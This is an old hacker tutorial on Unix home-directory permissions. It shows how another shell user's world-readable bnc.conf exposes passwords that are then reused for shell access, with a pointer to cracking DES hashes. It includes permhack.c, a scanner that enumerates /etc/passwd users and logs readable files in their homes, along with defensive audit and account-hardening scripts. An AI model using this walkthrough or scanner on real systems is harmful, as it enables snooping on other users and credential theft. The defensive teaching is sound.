___________    ____________    ____  __  ___    ______________
  |\    ____  \  |\    ____   \  |\   \|\ \|\  \  |\_____    ____\
  | \   \__|\  \ | \   \__|\   \ | \   \ \ \ \  \ | |   |\   \   |
  \  \    ___   | \ \    ____   \ \ \   \_| \_|  \ \|___| \   \__|
   \  \   \_|\  \_ \ \   \__|\   \ \ \      _     \      \ \   \
    \  \   \\ \   \ \ \   \ \ \   \ \ \     |\ http://www.haxworx.com
     \  \___\\ \___\ \ \___\ \ \___\ \ \____| \_____\      \ \___\
      \ |   | \ |   | \ |   | \ |   | \ |   |\ |    |       \ |   |
       \|___|  \|___|  \|___|  \|___|  \|___| \|____|        \|___|
 
 +-----------------------------------------------------------------------+
 |  Shell Misconfiguration Hacking (Understanding File Permissions)      |
 |  Author: BrainRawt                                                    |
 |  Email: brainrawt@hotmail.com                                         |
 |  Site: http://www.haxworx.com                                         |
 |  Greetz to grep and b0iler.                                           |
 +-----------------------------------------------------------------------+

 Updated on 5-11-02
 
 NOTE: This text will talk about logging into a shell via telnet/ssh, but
       keep in mind that with the proper CGI script you can do all of
       this hacking via a web browser as well.

 A Word from BrainRawt.......

 Many people will get a shell account and not understand the security
 that is involved in using it.  In my past experiences, I have found
 many /home/username dirs that offer a lot of information.  Information
 that I'm sure they don't think is available to me.  In this text we will
 use a "bounce" as an example.  Keep in mind that many things require
 config files with passwds in them. :)

 ------------------------------------------
 What's the Problem?
 ------------------------------------------
 Most /home/username dirs have 755 permissions.  This means that anyone
 can read (list) and execute (enter) the /home/username dir.  I can understand a
 user wanting these permissions on their "$HOME" dir if they are using their
 public_html dir to offer a webpage to the public.  If this is the case then
 the user must take other precautions to allow access to /home/username/public_html
 without allowing access to everything else in the /home/username dir.

 ------------------------------------------
 Why is This a Problem?
 ------------------------------------------
 Let's say that we are logged into our shell and we have just performed a
 "ps aux | grep bnc".  This will list the running processes on the system
 and echo back to us any line that mentions "bnc".

 [rawt@linux rawt]$ ps aux | grep bnc     ( NOTE: we can grep for anything. )

 lamah-joe    1059  0.0  0.2  1460  656 ?        S    Jun30   0:02 ./bnc

 [rawt@linux rawt]$

 Now we know that lamah-joe is running a ./bnc (bounce).  Why do we care? We care
 because most bounces require a password to be used.  That password must be in a 
 config file for the bounce.  :)

 Now we check lamah-joe's home dir for permissions.

 [rawt@linux rawt]$ ls -alk /home | grep lamah-joe

 drwxr-xr-x    8 lamah-joe   lamah-joe       4096 Jun 29 01:28 lamah-joe

 [rawt@linux rawt]$ 
 
 -------------------------------------------
 Understanding Permissions
 -------------------------------------------
 permissions  links  username    groupname       size  date          name
 drwxr-xr-x   8      lamah-joe   lamah-joe       4096  Jun 29 01:28  lamah-joe
 
 Breaking Down Permissions

 The leading "d" means the entry is a directory.
 The first rwx are the owner permissions.
 The second r-x are the group permissions.
 The third r-x are the "world" permissions.

 So in our case above, we can see that lamah-joe can "read/write/execute", anyone in the
 lamah-joe group can "read/execute", and everyone else can "read/execute".

 Everyone else = we the hackers. :)

 -------------------------------------------
 Performing the Hack
 -------------------------------------------

 Thanks to the almighty read/execute permissions we have on this user's "$HOME" dir, we
 can just perform an "ls" in their home dir.  HAHA  LAME!

 [rawt@linux /home]$ ls -alk /home/lamah-joe/
 
 drwx------    5 lamah-joe   lamah-joe       4096 Jul  4 09:49 .
 drwxrwsr-x   62 root        staff           4096 Jun 30 00:00 ..
 -rw-r--r--    1 lamah-joe   lamah-joe        266 Feb 19 16:53 .alias
 -rw-------    1 lamah-joe   lamah-joe        319 Jul  4 12:06 .bash_history
 -rw-r--r--    1 lamah-joe   lamah-joe        134 Feb 19 16:53 .bash_logout
 -rw-r--r--    1 lamah-joe   lamah-joe        409 Feb 19 16:53 .bash_profile
 -rw-r--r--    1 lamah-joe   lamah-joe        509 Feb 19 16:53 .bashrc
 -rw-r--r--    1 lamah-joe   lamah-joe        375 Feb 19 16:53 .cshrc
 drwx------    2 lamah-joe   lamah-joe       4096 Jul  4 09:49 .ssh
 -rw-r--r--    1 lamah-joe   lamah-joe     121323 Jun 19 04:46 nbtscan-1.0.2.tar.gz
 -rw-r--r--    1 lamah-joe   lamah-joe     584385 Jun 19 04:42 nmap-2.53.tgz
 drwx---r-x    5 lamah-joe   lamah-joe       4096 Jun 23 22:57 nmap
 drwxr-xr-x    5 lamah-joe   lamah-joe       5132 Jun 27 06:19 bounce
 
 [rawt@linux /home]$
 
 -----------------------------------------------------------------------------------------------
 What if the user's home dir only allows me to execute (enter) and I can't list the contents
 of his/her home dir?  How am I going to find what I need?  If this is the case then I suggest
 that you either know exactly what you are looking for or you use the "locate" command.
 HINT: If /home/username only allows you execution and not read, it doesn't mean that the
 dirs inside /home/username have the same permissions.
 -----------------------------------------------------------------------------------------------  

 We found that almighty wonderful "bounce" dir and it is world "read/execute" :).  Now for the   
 configuration file within it.

 [rawt@linux /home]$ ls -alk /home/lamah-joe/bounce/ | grep bnc.conf
 
 -rw-r--r--    1 lamah-joe   lamah-joe        375 Feb 19 16:53 bnc.conf

 [rawt@linux /home]$

 How nice of lamah-joe to leave his bnc.conf file world readable.  :)  Let's get that bnc passwd.  Now
 we view this bnc.conf file with our favorite Unix editor.  In my case it's "pico".

 [rawt@linux /home]$ pico bnc.conf

 Inside bnc.conf I found 2 lines.......

 S:james123j                Password for Supervisor Access
 D:1337:5:6ji5hf            ListenPort:MaxUsers:Password

 Sometimes these passwds are encrypted.  Don't worry.  It's only DES.
 You can decipher them with "John The Ripper".

 --------------------------------------------
 lamah-joe has been 0wn3d!
 --------------------------------------------

 What have I gained from this user's lack of Linux permission knowledge?

 I have gained a free bounce on lamahshell.com.

 I have checked further and discovered that lamah-joe uses the same pass
 for his shell.

 Soooooo!!!!  What have I gained now?

 A free bnc on lamah.com
 and
 A free shell on lamah.com

 ---------------------------------------------------------------
 What Do We Do With This Information?
 ---------------------------------------------------------------
 
 We could use this newfound information for malicious reasons.  We could
 use his bounce and not tell him, or maybe even hack from his shell.  I suggest
 that we fix all of lamah-joe's permissions and then tell him what has happened.  This
 is our way of spreading this knowledge to those that need to know.  We had fun
 exploring and lamah-joe learns a lesson.


 ---------------------------------------------------
 How Do We Protect Ourselves Against This?
 ---------------------------------------------------

 1. Study file permissions: how to use them and what they mean.
 
 2. Learn how to use "chmod".  Type "man chmod" at a Linux command prompt.
    (chmod is used to set file permissions.)

 3. I personally don't use the public_html in my shell accounts, so I have a
    tendency to "chmod 700 /home/myusername".  This allows only myself
    to enter my home dir.

 4. Always use encrypted and non-dictionary passwds when available.  Some kiddies
    may gain the ability to read your conf files but not all of them know how to
    decipher encryption.
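 The following script is an added example for this write-up, not BrainRawt's own code.  It ties
 together the "Breaking Down Permissions" section, the HINT about 711 home dirs, and the protection
 advice above: it reads the "world" triplet off an ls -l mode string, then audits a home-dir tree
 for files that are world-readable AND actually reachable (every dir on the way down is world-
 searchable).  The two layouts it builds (the lamah-joe 755 case and a hardened 711 home / 700 bin /
 755 public_html) and every username and path in it are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original text): audit which files under a
# home-dir tree "everyone else" can really read, and compare the 755 layout
# from the lamah-joe story with the 711 home / 700 bin / 755 public_html
# layout the protection section recommends.  All usernames and paths are
# constructed for this demo; nothing here comes from a real host.

# Print the "world" triplet (characters 8-10 of the ls -l mode string) for a path.
other_perms() {
    ls -ld "$1" | cut -c8-10
}

# List regular files under $1 that are world-readable (o+r) AND reachable,
# i.e. every directory on the way down is world-searchable (o+x).  A directory
# without o+x is pruned, so a 644 file inside a 700 dir is correctly NOT
# reported.  The start dir is tested too: a 700 home hides everything below it.
audit_reachable() {
    find "$1" -type d ! -perm -001 -prune -o -type f -perm -004 -print | sort
}

# Number of reachable world-readable files under $1.
reachable_count() {
    audit_reachable "$1" | wc -l | tr -d ' '
}

# Build a throw-away /home look-alike holding both layouts.  Prints its path.
build_demo() {
    root=$(mktemp -d) || return 1
    chmod 755 "$root"                                # like a real /home

    # weak layout (the write-up's case): 755 home, 755 bounce dir, 644 bnc.conf
    mkdir -p "$root/lamah-joe/bounce" "$root/lamah-joe/.ssh"
    : > "$root/lamah-joe/bounce/bnc.conf"
    : > "$root/lamah-joe/.ssh/id_rsa"
    chmod 755 "$root/lamah-joe" "$root/lamah-joe/bounce"
    chmod 700 "$root/lamah-joe/.ssh"
    chmod 644 "$root/lamah-joe/bounce/bnc.conf"
    chmod 600 "$root/lamah-joe/.ssh/id_rsa"

    # hardened layout (the newuser script's idea): 711 home, 700 bin, 755 public_html
    mkdir -p "$root/careful-jane/bin" "$root/careful-jane/public_html"
    : > "$root/careful-jane/bin/bnc.conf"
    : > "$root/careful-jane/public_html/index.html"
    : > "$root/careful-jane/notes.txt"               # 644 file left directly in the 711 home
    chmod 711 "$root/careful-jane"
    chmod 700 "$root/careful-jane/bin"
    chmod 755 "$root/careful-jane/public_html"
    chmod 644 "$root/careful-jane/bin/bnc.conf" \
              "$root/careful-jane/public_html/index.html" \
              "$root/careful-jane/notes.txt"
    echo "$root"
}

demo=$(build_demo)
echo "world perms on lamah-joe's home:    $(other_perms "$demo/lamah-joe")"    # r-x
echo "world perms on careful-jane's home: $(other_perms "$demo/careful-jane")" # --x
echo "reachable world-readable files under $demo:"
audit_reachable "$demo"
rm -rf "$demo"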


 --------------------------------------------------------------------------
 Here is a small "exploit" that automates searching the /home/user dirs for a
 given file that is readable because of improper file permissions.
 --------------------------------------------------------------------------

 ------------ START COPY OF permhack.c ----------------

/*
 *
 * permhack.c By BrainRawt (Understanding The Importance Of File Permissions)
 * Email: brainrawt@hotmail.com
 * Site: http://rawt.daemon.sh
 *
 * Note: This source was coded as a proof of concept for those people that
 *       don't think file permissions are important. I know that this could
 *       have been done a lot more easily in Perl or a shell script, but I wanted
 *       to learn C, so I thought this would be a good start in my humble C beginnings.
 *
 * The "passwd" path and the "/home/user" path may need to be modified for different
 * hosts or different distros of Linux.
 *
 *
 * usage: permhack <file-to-look-for> <log-file>
 *
 *
 * Greetz to Soltan^Gris and Netstar for their great help on this project.
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int main(int argc, char *argv[])
{
   FILE *passwd_file, *username_file, *log_file, *checkfile;
   int c, x, count;
   char *output_file;
   char *look4;
   char buffer[512];    /* full path: /home/<user>/<look4> */
   char buffer2[256];   /* one username extracted from /etc/passwd */
   int colon = 0;

   if (argc != 3)
   {
      printf("usage: %s <file-to-look-for> <log-file>\n", argv[0]);
      exit(1);
   }

   passwd_file = fopen("/etc/passwd", "r");

   if (passwd_file == NULL)
   {
      printf("\nSHIT! /etc/passwd either isnt there or we just cant read it.\n\n");
      return 1;
   }

   username_file = fopen("usernames", "w");

   if (username_file == NULL)
   {
      printf("\nSHIT! Cant write my extracted usernames from /etc/passwd to ~/usernames?\n\n");
      fclose(passwd_file);
      return 1;
   }

   /* Copy the first field (the login name) of every /etc/passwd line, one
    * name per line.  Everything after the first ':' is skipped until the
    * next newline, which is copied so the names stay separated. */
   while ((c = getc(passwd_file)) != EOF)
   {
      if (c == ':')
         colon = 1;
      if (c == '\n')
         colon = 0;
      if (colon == 0)
         putc(c, username_file);
   }
   fclose(username_file);
   fclose(passwd_file);

   look4 = argv[1];
   output_file = argv[2];

   username_file = fopen("usernames", "r");

   if (username_file == NULL)
   {
      printf("\nCannot open usernames for reading\n\n");
      return 1;
   }

   log_file = fopen(output_file, "w");
   if (log_file == NULL)
   {
      printf("\nCannot open %s for writing\n\n", output_file);
      fclose(username_file);
      return 1;
   }
   printf("looking for [%s] in the /home/user dirs and logging to [%s]\n\n", look4, output_file);

   count = 0;
   while ((x = getc(username_file)) != EOF)
   {
      if (x != '\n')
      {
         /* collect the username, leaving room for the terminating NUL */
         if (count < (int)sizeof(buffer2) - 1)
            buffer2[count++] = x;
      }
      else
      {
         buffer2[count] = '\0';
         /* build /home/<user>/<look4>; snprintf cannot overrun buffer */
         snprintf(buffer, sizeof(buffer), "/home/%s/%s", buffer2, look4);
         count = 0;
         /* fopen for reading succeeds only if the path exists and we may read it */
         checkfile = fopen(buffer, "r");
         if (checkfile != NULL)
         {
            printf("Found - %s\n", buffer);
            fprintf(log_file, " %s\n", buffer);
            fclose(checkfile);
         }
         memset(buffer2, 0, sizeof(buffer2));
      }
   }

   printf("\n");
   fclose(username_file);
   fclose(log_file);
   return 0;
}



 ------------- END COPY OF permhack.c -----------------


 --------------------------------------------------------------------------
 Here is a small shell script I wrote for an admin to use when creating
 a new account.  This will hopefully solve the problem discussed above.
 --------------------------------------------------------------------------

 ------------ START COPY OF newuser-----------------

#!/bin/sh
#
# My very quick and simple-ass way of solving the insecure
# permission problems for users on a shell.  We will protect
# their data in /home/username/bin via 700 and still allow access
# to ~/public_html via 755 so the webspace can still be used.  To protect
# from those snooping eyes that belong to other users on the system,
# we will chmod 711 the /home/username dir.  This stops anyone from
# listing its contents (a file left directly in it can still be reached
# by someone who knows its name, which is what the 700 bin dir is for).
# If you don't like this script then don't use it.  :P
#
# - BrainRawt (http://rawt.daemon.sh) (brainrawt@hotmail.com)

echo "What is the username of the account you wish to create?"
read LUSER
echo "Now creating account for $LUSER"
# -m makes useradd create the home dir even on distros where that is not the default
useradd -m "$LUSER"
if [ -d "/home/$LUSER" ];
 then
   chmod 711 "/home/$LUSER"
   mkdir "/home/$LUSER/bin"
   mkdir "/home/$LUSER/public_html"
 else
   echo "Where is the /home/$LUSER dir?"
   exit 1
fi

if [ -d "/home/$LUSER/bin" ];
 then
   chmod 700 "/home/$LUSER/bin"
   chown "$LUSER:$LUSER" "/home/$LUSER/bin"
  else
   echo "Where is the /home/$LUSER/bin dir?"
fi

if [ -d "/home/$LUSER/public_html" ];
  then
    chmod 755 "/home/$LUSER/public_html"
    chown "$LUSER:$LUSER" "/home/$LUSER/public_html"
  else
    echo "Where is the /home/$LUSER/public_html dir?"
fi

echo "Account for $LUSER has been successfully created."
passwd "$LUSER"

cat > "/home/$LUSER/README" <<- _EOF_


      ATT: Other users on this system can read any world-readable file
      that you place directly in your /home/YOURNAME dir if they know
      its name.  Please be safe and use your /home/YOURNAME/bin dir to
      store files that you wish to keep private.

      Thank You,
      Administration


_EOF_
# the README was written by root; hand it over to the new user
chown "$LUSER:$LUSER" "/home/$LUSER/README"


 --------------- END COPY OF newuser-----------------



 --------------------------------------------------------------------------
 Which Looks Better?  BlackHat or White?  You Decide! - BrainRawt

    Source: geocities.com/eljehad1/other